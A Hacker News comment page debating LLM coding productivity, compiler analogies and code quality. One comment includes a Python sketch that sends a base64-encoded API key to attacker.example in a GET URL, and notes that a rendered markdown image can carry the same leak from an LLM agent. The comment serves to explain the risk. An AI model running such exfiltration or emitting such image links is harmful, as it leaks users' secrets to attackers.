lunar_mycroft's comments | Hacker News

That's the theory. In practice, if your UI is changing a lot, the data your UI needs is also changing a lot, meaning that your data API will either have a lot of churn or you'll allow a lot of flexibility in how untrusted clients can use it, which introduces its own pile of issues.

For this to work, you'd have to fully specify the behavior of your program in the tests. Put another way, at that point your tests are the program. So the question is, which is a more convenient way to specify the behavior of a program: a traditional programming language, or tests written in that language. I think the answer should be fairly obvious.

Behavior does not need to be fully specified at the outset. It could be evaluated after the run. We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development. What is a bird but the output of a random walk algorithm selected by constraints bound by so many latent factors we might never fully grasp?

> Behavior does not need to be fully specified at the outset. It could be evaluated after the run.

This doesn't work when the software in question is written by competent humans, let alone the sort of random process you describe. A run of the software only tells you its behavior for a given input; it doesn't tell you all possible behaviors of the software. "I ran the code and the output looked good" is nowhere near sufficient.

> We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development.

There is a vast chasm between "bioinspiration is sometimes a good technique" and "genetic algorithms are a viable replacement for writing code".


Genetic algorithms created our species, which is far more complex than anything we have written in computer science. I think they have stood up to the test of creating a viable product for a given behavior.

And with future compute, you will be able to evaluate behavior across an entire range of inputs for countless putative functions. There will be a time when none of this is compute bound. It is today, but in three centuries or more?



> Genetic algorithms created our species, which is far more complex than anything we have written in computer science. I think they have stood up to the test of creating a viable product for a given behavior.

Yes, and our species is a fragile, barely functioning machine with an insane number of failure points and hilariously bad, inefficiently placed components.


There is no such thing as read-only network access. For example, you might think that limiting the LLM to making HTTP GET requests would prevent it from exfiltrating data, but there's nothing at all to stop the attacker's server from receiving such data encoded in the URL. Even worse, attackers can exploit this vector to exfiltrate data even without explicit network permissions if the user's client allows things like rendering markdown images.
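
To make the exfiltration vector concrete, here's a minimal sketch (the attacker.example domain, the endpoint, and the "secret" are all hypothetical; this illustrates the idea rather than any real exploit):

    import base64, urllib.request

    # Anything the agent happened to read: a config value, an API key, a file...
    secret = "api_key=sk-123-hypothetical"
    payload = base64.urlsafe_b64encode(secret.encode()).decode()

    # A "read only" GET request that still carries the secret out in the URL:
    urllib.request.urlopen(f"https://attacker.example/collect?d={payload}")

    # With no network permission at all, the same trick works if the user's
    # client renders markdown images; the model only has to emit:
    #   ![pixel](https://attacker.example/collect?d=<payload>)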

As an aside, both those statements were wrong. People who learned to drive well after cars were widely adopted were at no particular disadvantage when and if they decided to adopt the technology. You can see this is true by noting that at this point, no one alive learned to drive when cars first came out.

The core of your argument is that using LLMs is a skill that takes a significant amount of time to master. I'm not going to argue against that (although I have some doubts) because I think it's ultimately irrelevant. The question isn't "is prompting a skill that you'll need to be an effective software developer in the future" but "what other skills will you need to do so", and regardless of the answer you don't need to start adopting LLMs right away.

Maybe AI gets good enough at writing code that its users' knowledge of computer science and software development becomes irrelevant. In that case, approximately everyone on this site is just screwed. We're all in the business of selling that specialized knowledge, and if it's no longer required then companies aren't going to pay us to operate the AI, they're going to pay PMs, middle managers, executives, etc. But even that won't be particularly workable long term, because all their customers will realize they no longer need to pay the companies for software either. In this world, the price of software goes to zero (and hosting likely gets significantly more commoditized than it is now). Any time you put into learning to use LLMs for software development doesn't help you keep making money selling software, and actually stops you from picking up a new career.

If, on the other hand, CS and software engineering knowledge is still needed, companies will have to keep/restart hiring or training new developers. In terms of experience using AI, it is impossible for anyone to have less experience than these new developers. We will, however, have much more experience and knowledge of the aforementioned non-LLM skills that we're assuming (in this scenario) are still necessary for the job. In this scenario you might be better off if you'd started learning to prompt a bit earlier, but you'll still be fine if you didn't.


> People seem to believe that there is a burden of proof. There is not. What do I care if you are on board?

The burden of proof rests on those making the positive claim. You say you don't care if others get on board, but a) clearly a lot of others do (case in point: the linked article) and b) a quick check of your posts in this very thread shows that you are indeed making positive claims about the merits of LLM assisted software development.


> If you can solve "measure programming productivity with data" you'll have cracked one of the hardest problems in our industry.

That doesn't mean that we have to accept claims that LLMs drastically increase productivity without good evidence (or in the presence of evidence to the contrary). If anything, it means the opposite.


At this point the best evidence we have is a large volume of extremely experienced programmers - like antirez - saying "this stuff is amazing for coding productivity".

My own personal experience supports that too.

If you're determined to say "I refuse to accept appeal to authority here, I demand a solution to the measuring productivity problem first" then you're probably in for a long wait.


> At this point the best evidence we have is a large volume of extremely experienced programmers - like antirez - saying "this stuff is amazing for coding productivity".

The problem is that we know that developers' - including experienced developers' - subjective impressions of whether LLMs increase their productivity at all are unreliable and biased towards overestimation. Similarly, we know that previous claims of massive productivity gains were false (no reputable study showed even a 50% improvement, let alone the 2x, 5x, or 10x that some were claiming; indicators of actual projects shipped were flat; etc). People have been making the same claims for years at this point, and every time we actually were able to check, it turned out they were wrong. Further, while we can't check the productivity claims (yet) because that takes time, we can check other claims (e.g. the assertion that a model produces code that doesn't need to be reviewed by a human anymore), and those claims do turn out to be false.

> If you're determined to say "I refuse to accept appeal to authority here, I demand a solution to the measuring productivity problem first" then you're probably in for a long wait.

Maybe, but my point still stands. In the absence of actual measurement and evidence, claims of massive productivity gains do not win by default.


There are also plenty of extremely experienced programmers saying "this stuff is useless for programming".

If a bunch of people say "it's impossible to go to the moon, nobody has done it" and Buzz Aldrin says "I have been to the moon, here are the photos/video/NASA archives to prove it", who do you believe?

The equivalent of "we've been to the moon" in the case of LLMs would be:

"Hey Claude, generate a full Linux kernel from scratch for me, go on the web to find protocol definitions, it should handle Wifi, USB, Bluetooth, and have WebGL-backed window server"

And then have it run in a couple of hours/days to deliver, without touching it.

We are *far* from this


OK then, new analogy.

If a bunch of people say "there are no cafes in this town that serve brunch on a Sunday" and then Buzz Aldrin says "I just had a great brunch in the cafe over there, here's a photo", who would you listen to?


Well sure, but... that's anecdotal evidence. It's not a formal proof, with studies, etc.

Also in the age of AI this argument would be flawed precisely because that "photo" from Buzz Aldrin could be AI-generated, but that's beside the point


Be honest: how many things do you do in your day-to-day SW tasks that have been formally proven and have studies supporting it?

That's just... not the point of that discussion?

1. Most of CS has been formally proven (that's why it's called computer science)

2. Here we were discussing someone who claims to have "facts" and then just says "just play with it, you will understand"...


Check "confirmation bias": of course the few that speak loudly are those who:

- want to sell you AI

- have a popular blog mostly speaking on AI (same as #1)

- the ones for whom this productivity enhancement applies

but there are also thousands of other great coders for whom:

- the gains are negligible (useful, but "doesn't change fundamentally the game")

- we already see the limits of LLMs (nice "code in-painting", but can't be trusted for many reasons)

- besides that, we also see the impact on other people / coders, and we don't want that in our society


Many issues have been pointed out in the comments, in particular the fact that most of what antirez talks about is how "LLMs make it easy to fill in code for stuff he already knows how to do".

And indeed, in this case, "LLM code in-painting" (e.g. let the user define the constraints, then have the LLM act as a "code filler") works relatively nicely... BECAUSE the user knows how it should work and directed the LLM to do what he needs.

But this is just, e.g., a 2x/3x acceleration of coding tasks for coders who are already good; it is neither 100x, nor is it reachable for beginner coders.

Because what we see is that LLMs (for good reasons!!) *can't be trusted*, so you bear the burden of checking their code every time.

So 100x productivity IS NOT POSSIBLE, simply because it would take too long (and frankly be too boring) for a human to check 100x the output of a normal engineer (unless you spend 1000 hours upfront encoding your whole domain in a theorem-proving language like Lean and then verify the implementation against it... which would be so costly that the "100x gains" would already have disappeared).


Why would you turn down a 2-3x productivity boost?

Nobody is saying we want to "turn it down" (although if the boost is "only" 2x, there would be a pros/cons discussion, where the cons could include "this tech leads to authoritarian regimes everywhere").

What we are discussing here is whether this is a true step-change for coding, or whether it is merely a "coding improvement tool".


In the past week, I saw Opus 4.5 (being used by someone else) implement "JWT based authentication" by appending the key to a (fake) header and body. When asked to fix this, it switched to hashing the key (and nothing else) and appending the hash instead. The "signature" still did not depend on the body, meaning any attacker could trivially forge an arbitrary body, allowing them to e.g. impersonate any user they wanted.
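
For reference, here's a minimal sketch of what an HS256 JWT signature is supposed to cover (a simplified illustration, not any particular library's API): the HMAC is computed over both the encoded header and the encoded body, so neither can be altered without the key.

    import base64, hashlib, hmac, json

    def b64url(data: bytes) -> str:
        # JWTs use unpadded base64url encoding
        return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

    def sign_jwt_hs256(payload: dict, key: bytes) -> str:
        header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
        body = b64url(json.dumps(payload).encode())
        # The signature covers header *and* body; tamper with either and
        # verification fails.
        sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
        return f"{header}.{body}.{b64url(sig)}"

A "signature" that only hashes the key leaves the body completely unauthenticated, which is exactly the forgery problem described above.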

Do I think Opus 4.5 would always make that mistake? No. But it does indicate that the output of even SotA models needs careful review if the code actually matters.


Interestingly, things like domain name registrations and new GitHub repositories didn't have an inflection point in recent years [0]. This almost certainly means that a greater portion of new projects are getting submitted as Show HN, not that there are more new projects overall.

[0] https://mikelovesrobots.substack.com/p/wheres-the-shovelware...


Really surprising result that new public GitHub repositories haven't increased much. I wonder what actually caused the downtrend?

I'd be curious to see this article updated in a few months; post Opus 4.5 and other model updates we had towards the end of 2025.


> It's like the articles point: we don't do assembly anymore and no one considers gcc to be controversial and no one today says "if you think gcc is fun I will never understand you, real programming is assembly, that's the fun part"

The compiler reliably and deterministically produces code that does exactly what you specified in the source code. In most cases, the code it produces is also as fast as or faster than hand-written assembly. The same can't be said for LLMs, for the simple reason that English (and other natural languages) is not a programming language. You can't compile English (and shouldn't want to, as Dijkstra correctly pointed out) because it's ambiguous. All you can do is "commission" another "programmer" (the LLM) to interpret it for you.

> Do you resent folks like us that do find it fun?

For enjoying it on your own time? No. But for hyping up the technology well beyond its actual merits, antagonizing people who point out its shortcomings, and subjecting the rest of us to worse code? Yeah, I hold that against the LLM fans.


That a coding agent or LLM is a different technology than a compiler and that the delta in industry standard workflow looks different isn’t quite my point though: things change. Norms change. That’s the real crux of my argument.

> But for hyping up the technology well beyond it's actual merits, antagonizing people who point out it's shortcomings, and subjecting the rest of us to worse code? Yeah, I hold that against the LLM fans.

Is that what I'm doing? I understand your frustration. But I hope you understand that this is a straw man: I could straw-man the antagonists and AI-hostile folks too, but the point is that the factions and tribes are complex and unreasonable opinions abound. My stance is that people can dismiss coding agents at their peril, but it's not really a problem: taking the gcc analogy, in the early compiler days there was a period where compilers were weak enough that assembly by hand was reasonable. Now it would be highly inefficient and underperformant to do that. But all the folks that lamented compilers didn't crumble away; they eventually adapted. I see that analogy as applicable here. It may be hard to see how insane coding agents are because we're not time travelers from 2020, or even 2022 or 2023: this used to be an absurd idea and is now very serious and highly adopted. But still quite weak!! We're still missing key reliability, functionality, and capabilities. But if we got this far this fast, and if you realize that coding agent training is not limited in the same way that e.g. vanilla LLM training is (coding being a verifiable domain), we seem to be careening forward. But by nature of their current weakness, absolutely it is reasonable not to use them, and absolutely it is reasonable to point out all of their flaws.

Lots of unreasonable people out there, my argument is simply: be reasonable.


> Norms change. That’s the real crux of my argument.

Novelty isn't necessarily better as a replacement for what exists. Examples: blockchain as a fancy database, NFTs, Internet Explorer, Silverlight, etc.


No it's certainly not, and if you do want to lump coding agents in with blockchain and NFTs that's of course your choice, but those things did not spur trillions of dollars of infra buildout, reshape entire geopolitical landscapes, and gain billions of active users. If you want to say coding agents are not truly a net positive right now, that's I think a perfectly reasonable opinion to hold (though I disagree personally). If you want to say coding agents are about as vapid as NFTs, that to me is a bit less defensible.


As others have already pointed out, not all proposed new technologies are improvements. You say you understand this, but the clear subtext of the analogy to compilers is that LLM-driven development is an obvious improvement, and if we don't adopt it we'll find ourselves in the same position as assembly programmers who refused to learn compiled languages.

> Is that what I’m doing?

Initially I'd have been reluctant to say yes, but this very comment is laced with assertions that we'd better all start adopting LLMs for coding or we're going to get left behind. [0]

> taking the gcc analogy, in the early compiler days there was a period where compilers were weak enough that assembly by hand was reasonable. Now it would be just highly inefficient and underperformant to do that

No matter how good LLMs get at translating english into programs, they will still be limited by the fact that their input (natural language) isn't a programming language. This doesn't mean it can't get way better, but it's always going to have some of the same downsides of collaborating with another programmer.

[0] This is another red flag I would hope programmers would have learned to recognize. Good technology doesn't need to try to threaten people into adopting it.


My intention was to say: you won't get left behind you will just get left slightly behind the curve until things reach a point where you feel you have no choice but to join the dark side. Like gcc/assembly: sure maybe there were some hardcore assembly holdouts but any day they could and probably did jump on the bandwagon. This is also speculation, I agree, but my point is: not using LLMs/coding agents today is very very reasonable, and the limitations that people often bring up are also very reasonable and believable.

> No matter how good LLMs get at translating english into programs, they will still be limited by the fact that their input (natural language) isn't a programming language.

Right, but engineers routinely convert natural language + business context into formal programs; that's arguably an enormously important part of creating a software product. What's different here? As with a programmer, the creation process is two-way: the agent iteratively retrieves additional information, asks questions, checks its approach, etc.

> [0] This is another red flag I would hope programmers would have learned to recognize. Good technology doesn't need to try to threaten people into adopting it.

I think I was either not clear or you misread my comment: you're not going to get left behind any more than you want to. Jump in when you feel good about where the technology is and use it where you feel it should be used. Again: if you don't see value in your own personal situation with coding agents, that is objectively a reasonable stance to hold today.

